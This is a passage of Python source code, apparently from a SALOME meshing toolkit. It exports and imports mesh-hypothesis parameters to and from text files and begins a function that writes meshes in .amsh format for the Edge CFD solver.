hypothesis_file.write("ALLOWQUADRANGLES:\n%s\n"%(hypothesis.GetAllowQuadrangles()))
if hypothesis_type == "MG - CADSurf Parameters":
hypothesis_file.write("PHYSICALMESH:\n%s\n"%(hypothesis.GetPhysicalMesh()))
hypothesis_file.write("GEOMETRICMESH:\n%s\n"%(hypothesis.GetGeometricMesh()))
hypothesis_file.write("ANGLEMESH:\n%s\n"%(hypothesis.GetAngleMesh()))
hypothesis_file.write("CHORDALERROR:\n%s\n"%(hypothesis.GetChordalError()))
hypothesis_file.write("PHYSIZE:\n%s\n"%(hypothesis.GetPhySize()))
hypothesis_file.write("ISPHYSIZEREL:\n%s\n"%(hypothesis.IsPhySizeRel()))
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("ISMINSIZEREL:\n%s\n"%(hypothesis.IsMinSizeRel()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("ISMAXSIZEREL:\n%s\n"%(hypothesis.IsMaxSizeRel()))
hypothesis_file.write("QUADRATICMESH:\n%s\n"%(hypothesis.GetQuadraticMesh()))
hypothesis_file.write("GRADATION:\n%s\n"%(hypothesis.GetGradation()))
hypothesis_file.write("ANISOTROPIC:\n%s\n"%(hypothesis.GetAnisotropic()))
hypothesis_file.write("ANISOTROPICRATIO:\n%s\n"%(hypothesis.GetAnisotropicRatio()))
hypothesis_file.write("REMOVETINYEDGES:\n%s\n"%(hypothesis.GetRemoveTinyEdges()))
hypothesis_file.write("TINYEDGELENGTH:\n%s\n"%(hypothesis.GetTinyEdgeLength()))
hypothesis_file.write("BADELEMENTREMOVAL:\n%s\n"%(hypothesis.GetBadElementRemoval()))
hypothesis_file.write("BADELEMENTASPECTRATIO:\n%s\n"%(hypothesis.GetBadElementAspectRatio()))
hypothesis_file.write("OPTIMIZEMESH:\n%s\n"%(hypothesis.GetOptimizeMesh()))
hypothesis_file.write("QUADALLOWED:\n%s\n"%(hypothesis.GetQuadAllowed()))
hypothesis_file.write("OPTIONVALUES:\n%s\n"%(hypothesis.GetOptionValues()))
hypothesis_file.write("PRECADOPTIONVALUES:\n%s\n"%(hypothesis.GetPreCADOptionValues()))
hypothesis_file.write("TOPOLOGY:\n%s\n"%(hypothesis.GetTopology()))# int
hypothesis_file.write("PRECADMERGEEDGES:\n%s\n"%(hypothesis.GetPreCADMergeEdges()))
hypothesis_file.write("PRECADPROCESS3DTOPOLOGY:\n%s\n"%(hypothesis.GetPreCADProcess3DTopology()))
hypothesis_file.write("PRECADDISCARDINPUT:\n%s\n"%(hypothesis.GetPreCADDiscardInput()))
hypothesis_file.write("VERBOSITY:\n%s\n"%(hypothesis.GetVerbosity()))
hypothesis_file.write("GMFFILE:\n%s\n"%(hypothesis.GetGMFFile()))
if hypothesis_type == "ViscousLayers2D":
hypothesis_file.write("NUMBERLAYERS:\n%s\n"%(hypothesis.GetNumberLayers()))
hypothesis_file.write("STRETCHFACTOR:\n%s\n"%(hypothesis.GetStretchFactor()))
hypothesis_file.write("TOTALTHICKNESS:\n%s\n"%(hypothesis.GetTotalThickness()))
if hypothesis_type == "NumberOfLayers":# 3D
hypothesis_file.write("NUMBEROFLAYERS:\n%s\n"%(hypothesis.GetNumberOfLayers()))
if hypothesis_type == "MaxElementVolume":
hypothesis_file.write("MAXELEMENTVOLUME:\n%s\n"%(hypothesis.GetMaxElementVolume()))
if hypothesis_type == "NETGEN_SimpleParameters_3D":
hypothesis_file.write("MAXELEMENTVOLUME:\n%s\n"%(hypothesis.GetMaxElementVolume()))
if hypothesis_type == "MG - Tetra Parallel Parameters":
hypothesis_file.write("MEDNAME:\n%s\n"%(hypothesis.GetMEDName()))
hypothesis_file.write("NBPART:\n%s\n"%(hypothesis.GetNbPart()))
hypothesis_file.write("KEEPFILES:\n%s\n"%(hypothesis.GetKeepFiles()))
hypothesis_file.write("BACKGROUND:\n%s\n"%(hypothesis.GetBackground()))
hypothesis_file.write("MERGESUBDOMAINS:\n%s\n"%(hypothesis.GetToMergeSubdomains()))
hypothesis_file.write("TAGSUBDOMAINS:\n%s\n"%(hypothesis.GetToTagSubdomains()))
hypothesis_file.write("OUTPUTINTERFACES:\n%s\n"%(hypothesis.GetToOutputInterfaces()))
hypothesis_file.write("DISCARDSUBDOMAINS:\n%s\n"%(hypothesis.GetToDiscardSubdomains()))
if hypothesis_type == "MG - Hexa Parameters":
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("HEXESMINLEVEL:\n%s\n"%(hypothesis.GetHexesMinLevel()))
hypothesis_file.write("HEXESMAXLEVEL:\n%s\n"%(hypothesis.GetHexesMaxLevel()))
hypothesis_file.write("HEXOTICIGNORERIDGES:\n%s\n"%(hypothesis.GetHexoticIgnoreRidges()))
hypothesis_file.write("HEXOTICINVALIDELEMENTS:\n%s\n"%(hypothesis.GetHexoticInvalidElements()))
hypothesis_file.write("HEXOTICSHARPANGLETHRESHOLD:\n%s\n"%(hypothesis.GetHexoticSharpAngleThreshold()))
hypothesis_file.write("HEXOTICNBPROC:\n%s\n"%(hypothesis.GetHexoticNbProc()))
hypothesis_file.write("HEXOTICWORKINGDIRECTORY:\n%s\n"%(hypothesis.GetHexoticWorkingDirectory()))
hypothesis_file.write("HEXOTICMAXMEMORY:\n%s\n"%(hypothesis.GetHexoticMaxMemory()))
hypothesis_file.write("HEXOTICVERBOSITY:\n%s\n"%(hypothesis.GetHexoticVerbosity()))
hypothesis_file.write("HEXOTICSDMODE:\n%s\n"%(hypothesis.GetHexoticSdMode()))
hypothesis_file.write("TEXTOPTIONS:\n%s\n"%(hypothesis.GetTextOptions()))
hypothesis_file.write("NBLAYERS:\n%s\n"%(hypothesis.GetNbLayers()))
hypothesis_file.write("FIRSTLAYERSIZE:\n%s\n"%(hypothesis.GetFirstLayerSize()))
hypothesis_file.write("DIRECTION:\n%s\n"%(hypothesis.GetDirection()))
hypothesis_file.write("GROWTH:\n%s\n"%(hypothesis.GetGrowth()))
if hypothesis_type == "MG - Tetra Parameters":
hypothesis_file.write("TOMESHHOLES:\n%s\n"%(hypothesis.GetToMeshHoles()))
hypothesis_file.write("TOMAKEGROUPSOFDOMAINS:\n%s\n"%(hypothesis.GetToMakeGroupsOfDomains()))
hypothesis_file.write("OPTIMIZATIONLEVEL:\n%s\n"%(hypothesis.GetOptimizationLevel()))
hypothesis_file.write("INITIALMEMORY:\n%s\n"%(hypothesis.GetInitialMemory()))
hypothesis_file.write("MAXIMUMMEMORY:\n%s\n"%(hypothesis.GetMaximumMemory()))
hypothesis_file.write("WORKINGDIRECTORY:\n%s\n"%(hypothesis.GetWorkingDirectory()))
hypothesis_file.write("VERBOSELEVEL:\n%s\n"%(hypothesis.GetVerboseLevel()))
hypothesis_file.write("STANDARDOUTPUTLOG:\n%s\n"%(hypothesis.GetStandardOutputLog()))
hypothesis_file.write("REMOVELOGONSUCCESS:\n%s\n"%(hypothesis.GetRemoveLogOnSuccess()))
hypothesis_file.write("KEEPFILES:\n%s\n"%(hypothesis.GetKeepFiles()))
hypothesis_file.write("TOCREATENEWNODES:\n%s\n"%(hypothesis.GetToCreateNewNodes()))
hypothesis_file.write("TOUSEBOUNDARYRECOVERYVERSION:\n%s\n"%(hypothesis.GetToUseBoundaryRecoveryVersion()))
hypothesis_file.write("TOREMOVECENTRALPOINT:\n%s\n"%(hypothesis.GetToRemoveCentralPoint()))
hypothesis_file.write("FEMCORRECTION:\n%s\n"%(hypothesis.GetFEMCorrection()))
hypothesis_file.write("GRADATION:\n%s\n"%(hypothesis.GetGradation()))
hypothesis_file.write("TEXTOPTION:\n%s\n"%(hypothesis.GetTextOption()))
if hypothesis_type == "HYBRID_Parameters":
hypothesis_file.write("BOUNDARYLAYERSGROWTH:\n%s\n"%(hypothesis.GetBoundaryLayersGrowth()))
hypothesis_file.write("HEIGHTFIRSTLAYER:\n%s\n"%(hypothesis.GetHeightFirstLayer()))
hypothesis_file.write("NBOFBOUNDARYLAYERS:\n%s\n"%(hypothesis.GetNbOfBoundaryLayers()))
hypothesis_file.write("BOUNDARYLAYERSPROGRESSION:\n%s\n"%(hypothesis.GetBoundaryLayersProgression()))
hypothesis_file.write("COLLISIONMODE:\n%s\n"%(hypothesis.GetCollisionMode()))
hypothesis_file.write("ELEMENTGENERATION:\n%s\n"%(hypothesis.GetElementGeneration()))
hypothesis_file.write("ADDMULTINORMALS:\n%s\n"%(hypothesis.GetAddMultinormals()))
hypothesis_file.write("MULTINORMALSANGLE:\n%s\n"%(hypothesis.GetMultinormalsAngle()))
hypothesis_file.write("SMOOTHNORMALS:\n%s\n"%(hypothesis.GetSmoothNormals()))
hypothesis_file.write("WORKINGDIRECTORY:\n%s\n"%(hypothesis.GetWorkingDirectory()))
hypothesis_file.write("VERBOSELEVEL:\n%s\n"%(hypothesis.GetVerboseLevel()))
hypothesis_file.write("STANDARDOUTPUTLOG:\n%s\n"%(hypothesis.GetStandardOutputLog()))
hypothesis_file.write("REMOVELOGONSUCCESS:\n%s\n"%(hypothesis.GetRemoveLogOnSuccess()))
hypothesis_file.write("KEEPFILES:\n%s\n"%(hypothesis.GetKeepFiles()))
hypothesis_file.write("TEXTOPTION:\n%s\n"%(hypothesis.GetTextOption()))
if hypothesis_type == "ViscousLayers":# 3D
hypothesis_file.write("NUMBERLAYERS:\n%s\n"%(hypothesis.GetNumberLayers()))
hypothesis_file.write("STRETCHFACTOR:\n%s\n"%(hypothesis.GetStretchFactor()))
hypothesis_file.write("TOTALTHICKNESS:\n%s\n"%(hypothesis.GetTotalThickness()))
hypothesis_file.write("METHOD:\n%s\n"%(hypothesis.GetMethod()))
#-
# Close hypothesis file
hypothesis_file.close()
#-
eh = ExportHypotheses
def ImportHypotheses( file = "cfdmsh_hps" ):
"""
Description:
Imports a hypotheses file created with the ExportHypotheses function.
Arguments:
# file
Description: The name of the file to read.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_hps"
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
if False: pass
else:# All checks done
# Open the hypothesis file
hypothesis_file = open(file, "r")
#-
# Read the file
is_a_hypothesis_type_line = False
is_a_hypothesis_name_line = False
is_a_hypothesis_parameter_line = False
min_size = 0.0# This is for MG - CADSurf
max_size = 0.0#
phy_size = 0.0#
for line in hypothesis_file:# For each line in the hypothesis file...
line = line[:-1]# Delete ending "\n"
if is_a_hypothesis_type_line == True:# If it is a "type" line...
if "NETGEN" in line:
hypothesis = smesh.CreateHypothesis(line, "NETGENEngine")
elif "MG - CADSurf" in line:
hypothesis = smesh.CreateHypothesis(line, "BLSURFEngine")
elif "MG - Tetra Parallel" in line:
hypothesis = smesh.CreateHypothesis(line, "GHS3DPRLEngine")
elif "MG - Hexa Parameters" in line:
hypothesis = smesh.CreateHypothesis(line, "HexoticEngine")
elif "MG - Tetra Parameters" in line:
hypothesis = smesh.CreateHypothesis(line, "GHS3DEngine")
elif "HYBRID" in line:
hypothesis = smesh.CreateHypothesis(line, "HYBRIDEngine")
else:
hypothesis = smesh.CreateHypothesis(line)
elif is_a_hypothesis_name_line == True:# If it is a "name" line...
smesh.SetName(hypothesis, line)
elif is_a_hypothesis_parameter_line == True:# If it is a parameter line...
if parameter_type == "LENGTH:": hypothesis.SetLength(float(line))
if parameter_type == "PRECISION:": hypothesis.SetPrecision(float(line))
if parameter_type == "PRESSTIMATEDLENGTH:": hypothesis.SetPreestimatedLength(float(line))
if parameter_type == "USEPRESSTIMATEDLENGTH:": hypothesis.SetUsePreestimatedLength(line == "True")
if parameter_type == "STARTLENGTH:": hypothesis.SetStartLength(float(line))
if parameter_type == "ENDLENGTH:": hypothesis.SetEndLength(float(line))
if parameter_type == "COMMONRATIO:": hypothesis.SetCommonRatio(float(line))
if parameter_type == "NBSEGMENTS:": hypothesis.SetNbSegments(ast.literal_eval(line))
if parameter_type == "POINTS:": hypothesis.SetPoints(ast.literal_eval(line))
if parameter_type == "NUMBEROFSEGMENTS:":
try: hypothesis.SetNumberOfSegments(int(line))
except: pass
if parameter_type == "DISTRTYPE:": hypothesis.SetDistrType(int(line))
if parameter_type == "SCALEFACTOR:": hypothesis.SetScaleFactor(float(line))
if parameter_type == "TABLEFUNCTION:": hypothesis.SetTableFunction(ast.literal_eval(line))
if parameter_type == "EXPRESSIONFUNCTION:": hypothesis.SetExpressionFunction(str(line))
if parameter_type == "CONVERSIONMODE:": hypothesis.SetConversionMode(int(line))
if parameter_type == "DEFLECTION:": hypothesis.SetDeflection(float(line))
if parameter_type == "MINSIZE:":
min_size = float(line)
hypothesis.SetMinSize(min_size)
if parameter_type == "MAXSIZE:":
max_size = float(line)
hypothesis.SetMaxSize(max_size)
if parameter_type == "FINENESS:":
try: hypothesis.SetFineness(float(line))
except: hypothesis.SetFineness(int(line))
if parameter_type == "GROWTHRATE:": hypothesis.SetGrowthRate(float(line))
if parameter_type == "NBSEGPEREDGE:": hypothesis.SetNbSegPerEdge(float(line))
if parameter_type == "NBSEGPERRADIUS:": hypothesis.SetNbSegPerRadius(float(line))
if parameter_type == "USESURFACECURVATURE:": hypothesis.SetUseSurfaceCurvature(line == "True")
if parameter_type == "QUADALLOWED:": hypothesis.SetQuadAllowed(line == "True")
if parameter_type == "ALLOWQUADRANGLES:": hypothesis.SetAllowQuadrangles(line == "True")
if parameter_type == "OPTIMIZE:": hypothesis.SetOptimize(line == "True")
if parameter_type == "FUSEEDGES:": hypothesis.SetFuseEdges(line == "True")
if parameter_type == "SECONDORDER:": hypothesis.SetSecondOrder(line == "True")
if parameter_type == "MAXELEMENTAREA:": hypothesis.SetMaxElementArea(float(line))
if parameter_type == "MAXELEMENTVOLUME:": hypothesis.SetMaxElementVolume(float(line))
if parameter_type == "LOCALLENGTH:":
try:hypothesis.SetLocalLength(float(line))
except:pass
if parameter_type == "QUADTYPE:":
if line == "QUAD_STANDARD":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_STANDARD)
if line == "QUAD_TRIANGLE_PREF":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_TRIANGLE_PREF)
if line == "QUAD_QUADRANGLE_PREF":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_QUADRANGLE_PREF)
if line == "QUAD_QUADRANGLE_PREF_REVERSED":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_QUADRANGLE_PREF_REVERSED)
if line == "QUAD_REDUCED":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_REDUCED)
if parameter_type == "NUMBEROFLAYERS:": hypothesis.SetNumberOfLayers(int(line))
if parameter_type == "NUMBERLAYERS:": hypothesis.SetNumberLayers(int(line))
if parameter_type == "STRETCHFACTOR:": hypothesis.SetStretchFactor(float(line))
if parameter_type == "TOTALTHICKNESS:": hypothesis.SetTotalThickness(float(line))
if parameter_type == "METHOD:":
if line == "SURF_OFFSET_SMOOTH": hypothesis.SetMethod(StdMeshersBuilder.SURF_OFFSET_SMOOTH)
if line == "NODE_OFFSET": hypothesis.SetMethod(StdMeshersBuilder.NODE_OFFSET)
if line == "FACE_OFFSET": hypothesis.SetMethod(StdMeshersBuilder.FACE_OFFSET)
if parameter_type == "MEDNAME:": hypothesis.SetMEDName(str(line))
if parameter_type == "NBPART:": hypothesis.SetNbPart(int(line))
if parameter_type == "KEEPFILES:": hypothesis.SetKeepFiles(line == "True")
if parameter_type == "BACKGROUND:": hypothesis.SetBackground(line == "True")
if parameter_type == "MERGESUBDOMAINS:": hypothesis.SetToMergeSubdomains(line == "True")
if parameter_type == "TAGSUBDOMAINS:": hypothesis.SetToTagSubdomains(line == "True")
if parameter_type == "OUTPUTINTERFACES:": hypothesis.SetToOutputInterfaces(line == "True")
if parameter_type == "DISCARDSUBDOMAINS:": hypothesis.SetToDiscardSubdomains(line == "True")
if parameter_type == "HEXESMINLEVEL:": hypothesis.SetHexesMinLevel(int(line))
if parameter_type == "HEXESMAXLEVEL:": hypothesis.SetHexesMaxLevel(int(line))
if parameter_type == "HEXOTICIGNORERIDGES:": hypothesis.SetHexoticIgnoreRidges(line == "True")
if parameter_type == "HEXOTICINVALIDELEMENTS:": hypothesis.SetHexoticInvalidElements(line == "True")
if parameter_type == "HEXOTICSHARPANGLETHRESHOLD:": hypothesis.SetHexoticSharpAngleThreshold(float(line))
if parameter_type == "HEXOTICNBPROC:": hypothesis.SetHexoticNbProc(int(line))
if parameter_type == "HEXOTICWORKINGDIRECTORY:": hypothesis.SetHexoticWorkingDirectory(str(line))
if parameter_type == "HEXOTICMAXMEMORY:": hypothesis.SetHexoticMaxMemory(int(line))
if parameter_type == "HEXOTICVERBOSITY:": hypothesis.SetHexoticVerbosity(int(line))
if parameter_type == "HEXOTICSDMODE:": hypothesis.SetHexoticSdMode(int(line))
if parameter_type == "NBLAYERS:": hypothesis.SetNbLayers(int(line))
if parameter_type == "FIRSTLAYERSIZE:": hypothesis.SetFirstLayerSize(float(line))
if parameter_type == "DIRECTION:": hypothesis.SetDirection(line == "True")
if parameter_type == "GROWTH:": hypothesis.SetGrowth(float(line))
if parameter_type == "MAXSIZE:": hypothesis.SetMaxSize(float(line))
if parameter_type == "MINSIZE:": hypothesis.SetMinSize(float(line))
if parameter_type == "KEEPFILES:": hypothesis.SetKeepFiles(line == "True")
if parameter_type == "TEXTOPTIONS:": hypothesis.SetTextOptions(str(line))
if parameter_type == "TOMESHHOLES:": hypothesis.SetToMeshHoles(line == "True")
if parameter_type == "TOMAKEGROUPSOFDOMAINS:": hypothesis.SetToMakeGroupsOfDomains(line == "True")
if parameter_type == "OPTIMIZATIONLEVEL:": hypothesis.SetOptimizationLevel(int(line))
if parameter_type == "INITIALMEMORY:": hypothesis.SetInitialMemory(int(line))
if parameter_type == "MAXIMUMMEMORY:": hypothesis.SetMaximumMemory(int(line))
if parameter_type == "WORKINGDIRECTORY:": hypothesis.SetWorkingDirectory(str(line))
if parameter_type == "VERBOSELEVEL:": hypothesis.SetVerboseLevel(int(line))
if parameter_type == "STANDARDOUTPUTLOG:": hypothesis.SetStandardOutputLog(line == "True")
if parameter_type == "REMOVELOGONSUCCESS:": hypothesis.SetRemoveLogOnSuccess(line == "True")
if parameter_type == "TOCREATENEWNODES:": hypothesis.SetToCreateNewNodes(line == "True")
if parameter_type == "TOUSEBOUNDARYRECOVERYVERSION:": hypothesis.SetToUseBoundaryRecoveryVersion(line == "True")
if parameter_type == "TOREMOVECENTRALPOINT:": hypothesis.SetToRemoveCentralPoint(line == "True")
if parameter_type == "FEMCORRECTION:": hypothesis.SetFEMCorrection(line == "True")
if parameter_type == "GRADATION:": hypothesis.SetGradation(float(line))
if parameter_type == "TEXTOPTION:": hypothesis.SetTextOption(str(line))
if parameter_type == "BOUNDARYLAYERSGROWTH:": hypothesis.SetBoundaryLayersGrowth(int(line))
if parameter_type == "HEIGHTFIRSTLAYER:": hypothesis.SetHeightFirstLayer(float(line))
if parameter_type == "NBOFBOUNDARYLAYERS:": hypothesis.SetNbOfBoundaryLayers(int(line))
if parameter_type == "BOUNDARYLAYERSPROGRESSION:": hypothesis.SetBoundaryLayersProgression(float(line))
if parameter_type == "COLLISIONMODE:": hypothesis.SetCollisionMode(int(line))
if parameter_type == "ELEMENTGENERATION:": hypothesis.SetElementGeneration(int(line))
if parameter_type == "ADDMULTINORMALS:": hypothesis.SetAddMultinormals(line == "True")
if parameter_type == "MULTINORMALSANGLE:": hypothesis.SetMultinormalsAngle(float(line))
if parameter_type == "SMOOTHNORMALS:": hypothesis.SetSmoothNormals(line == "True")
if parameter_type == "PHYSICALMESH:": hypothesis.SetPhysicalMesh(int(line))
if parameter_type == "GEOMETRICMESH:": hypothesis.SetGeometricMesh(int(line))
if parameter_type == "ANGLEMESH:": hypothesis.SetAngleMesh(float(line))
if parameter_type == "CHORDALERROR:": hypothesis.SetChordalError(float(line))
if parameter_type == "PHYSIZE:":
phy_size = float(line)
hypothesis.SetPhySize(phy_size)
if parameter_type == "ISPHYSIZEREL:":
if line == "True": hypothesis.SetPhySizeRel(phy_size)
if parameter_type == "ISMINSIZEREL:":
if line == "True": hypothesis.SetMinSizeRel(min_size)
if parameter_type == "ISMAXSIZEREL:":
if line == "True": hypothesis.SetMaxSizeRel(max_size)
if parameter_type == "QUADRATICMESH:": hypothesis.SetQuadraticMesh(line == "True")
if parameter_type == "ANISOTROPIC:": hypothesis.SetAnisotropic(line == "True")
if parameter_type == "ANISOTROPICRATIO:": hypothesis.SetAnisotropicRatio(float(line))
if parameter_type == "REMOVETINYEDGES:": hypothesis.SetRemoveTinyEdges(line == "True")
if parameter_type == "TINYEDGELENGTH:": hypothesis.SetTinyEdgeLength(float(line))
if parameter_type == "BADELEMENTREMOVAL:": hypothesis.SetBadElementRemoval(line == "True")
if parameter_type == "BADELEMENTASPECTRATIO:": hypothesis.SetBadElementAspectRatio(float(line))
if parameter_type == "OPTIMIZEMESH:": hypothesis.SetOptimizeMesh(line == "True")
if parameter_type == "OPTIONVALUES:": hypothesis.SetOptionValues(ast.literal_eval(line))
if parameter_type == "PRECADOPTIONVALUES:": hypothesis.SetPreCADOptionValues(ast.literal_eval(line))
if parameter_type == "TOPOLOGY:": hypothesis.SetTopology(int(line))# int
if parameter_type == "PRECADMERGEEDGES:": hypothesis.SetPreCADMergeEdges(line == "True")
if parameter_type == "PRECADPROCESS3DTOPOLOGY:": hypothesis.SetPreCADProcess3DTopology(line == "True")
if parameter_type == "PRECADDISCARDINPUT:": hypothesis.SetPreCADDiscardInput(line == "True")
if parameter_type == "VERBOSITY:": hypothesis.SetVerbosity(int(line))
if parameter_type == "GMFFILE:": hypothesis.SetGMFFile(str(line))
is_a_hypothesis_type_line = False
is_a_hypothesis_name_line = False
is_a_hypothesis_parameter_line = False
if line.find("TYPE:") == 0:
is_a_hypothesis_type_line = True
elif line.find("NAME:") == 0:
is_a_hypothesis_name_line = True
elif line in [\
"LENGTH:", \
"PRECISION:", \
"PRESSTIMATEDLENGTH:", \
"USEPRESSTIMATEDLENGTH:", \
"STARTLENGTH:", \
"ENDLENGTH:", \
"COMMONRATIO:", \
"NBSEGMENTS:", \
"POINTS:", \
"NUMBEROFSEGMENTS:", \
"DISTRTYPE:", \
"SCALEFACTOR:", \
"TABLEFUNCTION:", \
"EXPRESSIONFUNCTION:", \
"CONVERSIONMODE:", \
"DEFLECTION:", \
"MINSIZE:", \
"MAXSIZE:", \
"FINENESS:", \
"GROWTHRATE:", \
"NBSEGPEREDGE:", \
"NBSEGPERRADIUS:", \
"USESURFACECURVATURE:", \
"QUADALLOWED:", \
"OPTIMIZE:", \
"FUSEEDGES:", \
"ALLOWQUADRANGLES:", \
"SECONDORDER:", \
"MAXELEMENTAREA:", \
"MAXELEMENTVOLUME:", \
"LOCALLENGTH:", \
"QUADTYPE:", \
"MAXELEMENTAREA:", \
"NUMBEROFLAYERS:", \
"NUMBERLAYERS:", \
"STRETCHFACTOR:", \
"TOTALTHICKNESS:", \
"METHOD:", \
"MEDNAME:", \
"NBPART:", \
"KEEPFILES:", \
"BACKGROUND:", \
"MERGESUBDOMAINS:", \
"TAGSUBDOMAINS:", \
"OUTPUTINTERFACES:", \
"DISCARDSUBDOMAINS:", \
"HEXESMINLEVEL:", \
"HEXESMAXLEVEL:", \
"HEXOTICIGNORERIDGES:", \
"HEXOTICINVALIDELEMENTS:", \
"HEXOTICMAXMEMORY:", \
"HEXOTICNBPROC:", \
"HEXOTICSDMODE:", \
"NBLAYERS:", \
"FIRSTLAYERSIZE:", \
"DIRECTION:", \
"GROWTH:", \
"HEXOTICSHARPANGLETHRESHOLD:", \
"HEXOTICVERBOSITY:", \
"HEXOTICWORKINGDIRECTORY:", \
"MAXSIZE:", \
"MINSIZE:", \
"TEXTOPTIONS:", \
"TOMESHHOLES:", \
"TOMAKEGROUPSOFDOMAINS:", \
"OPTIMIZATIONLEVEL:", \
"INITIALMEMORY:", \
"MAXIMUMMEMORY:", \
"WORKINGDIRECTORY:", \
"VERBOSELEVEL:", \
"STANDARDOUTPUTLOG:", \
"REMOVELOGONSUCCESS:", \
"TOCREATENEWNODES:", \
"TOUSEBOUNDARYRECOVERYVERSION:", \
"TOREMOVECENTRALPOINT:", \
"FEMCORRECTION:", \
"GRADATION:", \
"TEXTOPTION:", \
"BOUNDARYLAYERSGROWTH:", \
"HEIGHTFIRSTLAYER:", \
"NBOFBOUNDARYLAYERS:", \
"BOUNDARYLAYERSPROGRESSION:", \
"COLLISIONMODE:", \
"ELEMENTGENERATION:", \
"ADDMULTINORMALS:", \
"MULTINORMALSANGLE:", \
"SMOOTHNORMALS:", \
"PHYSICALMESH:", \
"GEOMETRICMESH:", \
"ANGLEMESH:", \
"CHORDALERROR:", \
"PHYSIZE:", \
"ISPHYSIZEREL:", \
"ISMINSIZEREL:", \
"ISMAXSIZEREL:", \
"QUADRATICMESH:", \
"ANISOTROPIC:", \
"ANISOTROPICRATIO:", \
"REMOVETINYEDGES:", \
"TINYEDGELENGTH:", \
"BADELEMENTREMOVAL:", \
"BADELEMENTASPECTRATIO:", \
"OPTIMIZEMESH:", \
"OPTIONVALUES:", \
"PRECADOPTIONVALUES:", \
"TOPOLOGY:", \
"PRECADMERGEEDGES:", \
"PRECADPROCESS3DTOPOLOGY:", \
"PRECADDISCARDINPUT:", \
"VERBOSITY:", \
"GMFFILE:" \
]:
is_a_hypothesis_parameter_line = True
parameter_type = line
#-
# Update the study tree
salome.sg.updateObjBrowser(1)
#-
# Close hypothesis file
hypothesis_file.close()
#-
ih = ImportHypotheses
def ExportAmshFile( mesh = None, file = None, only = [None], ignore = [None], help = False ):
"""
Description:
Exports a mesh into an .amsh file readable by the CFD solver Edge 5.0.0.
Arguments:
# mesh
Description: The mesh to export.
Type: Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# file
Description: The name without extension of the amsh file to write. If equals None, the name of the mesh in the study tree is taken.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# only
Description: The list of names of groups to export, excluding the others.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# ignore
Description: The list of names of groups to ignore.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# help
Description: Activates the generation of a help file giving relation between Edge and Salome node IDs (slows down the mesh export).
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
The mesh has to be computed and to contain groups describing the desired boundary conditions (inlet, outlet, wall, farfield, etc.).
Warning: In the case the mesh is the result of a mesh fusion, the nodes and then the elements of the meshes to fuse have to be reordered before the fusion, else Edge can detect a Max dev. of accum. surface vector superior to its allowed tolerance during the preprocessor command execution.
"""
# Get the input shape(s)
mesh = GetGUISelection(mesh, uniq = True)
mesh = GetObject(mesh, "SMESH")
#-
# Check the input shape existence
if "error" in [mesh] or None in [mesh]: return
#-
else:# All checks done
def WriteInColumns(file, table, nb_columns, nb_identation_spaces, nb_spaces = 6):
n = 0
for element in table:
if n%nb_columns == 0:
for s in range(nb_identation_spaces):
file.write(" ")
else:
for s in range(nb_spaces):
file.write(" ")
if type(element) == type("string"):
file.write("%s"%(element))
elif type(element) == type(1.0):
file.write("%.16f"%(element))
elif type(element) == type(1):
file.write("%i"%(element))
if (n + 1)%nb_columns == 0 or n == len(table) - 1:
file.write("\n")
n += 1
def powerOfTen(figure):
figure *= 1.0
n = 0
if figure != 0:
if abs(figure) < 1:
while abs(figure) < 1:
figure *= 10
n -= 1
if abs(figure) >= 10:
while abs(figure) >= 10:
figure /= 10
n += 1
return figure, n
if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
try:
mesh = smesh.Mesh(mesh)
except:
pass
else:
print "[X] The input object is not a mesh or the Mesh module was not yet loaded."; return
# Get the mesh name
mesh_name = mesh.GetName()
#-
# Renumber elements and nodes
mesh.RenumberNodes()
mesh.RenumberElements()
#-
# Get nodes number and IDs
nb_nodes_in_mesh = mesh.NbNodes()
node_ids_in_mesh = mesh.GetNodesId()
#-
# Get edges IDs
edge_ids_in_mesh = mesh.GetElementsByType(SMESH.EDGE)
nb_edges_in_mesh = mesh.NbEdges()
#-
# Get faces IDs
face_ids_in_mesh = mesh.GetElementsByType(SMESH.FACE)
nb_faces_in_mesh = mesh.NbFaces()
nb_triangles_in_mesh = mesh.NbTriangles()
nb_quadrangles_in_mesh = mesh.NbQuadrangles()
#-
# Get volumes IDs
nb_volumes_in_mesh = mesh.NbVolumes()
nb_tetrahedrons_in_mesh = mesh.NbTetras()
nb_pyramids_in_mesh = mesh.NbPyramids()
nb_prisms_in_mesh = mesh.NbPrisms()
nb_hexahedrons_in_mesh = mesh.NbHexas()
volume_ids_in_mesh = mesh.GetElementsByType(SMESH.VOLUME)
#-
# Get mesh dimension
if nb_volumes_in_mesh != 0:
mesh_dimension = 3
nb_elements_in_domain = nb_volumes_in_mesh
else:
mesh_dimension = 2
nb_elements_in_domain = nb_faces_in_mesh
#-
# Get groups
group_names = mesh.GetGroupNames()
groups = mesh.GetGroups()
#-
# Sort groups
sorted_groups = []
if only != [None]:
for group in groups:
group_name = group.GetName()
if group_name in only:
sorted_groups.append(group)
groups = sorted_groups
sorted_groups = []
if ignore != [None]:
for group in groups:
group_name = group.GetName()
if group_name not in ignore:
sorted_groups.append(group)
groups = sorted_groups
# Get the number of groups
nb_groups = len(groups)
# Get group types
group_types = []
for group in groups:
group_type = str(group.GetType())
group_types.append(group_type)
#-
# Open the amsh file
date = time.asctime(time.localtime())
if file == None:
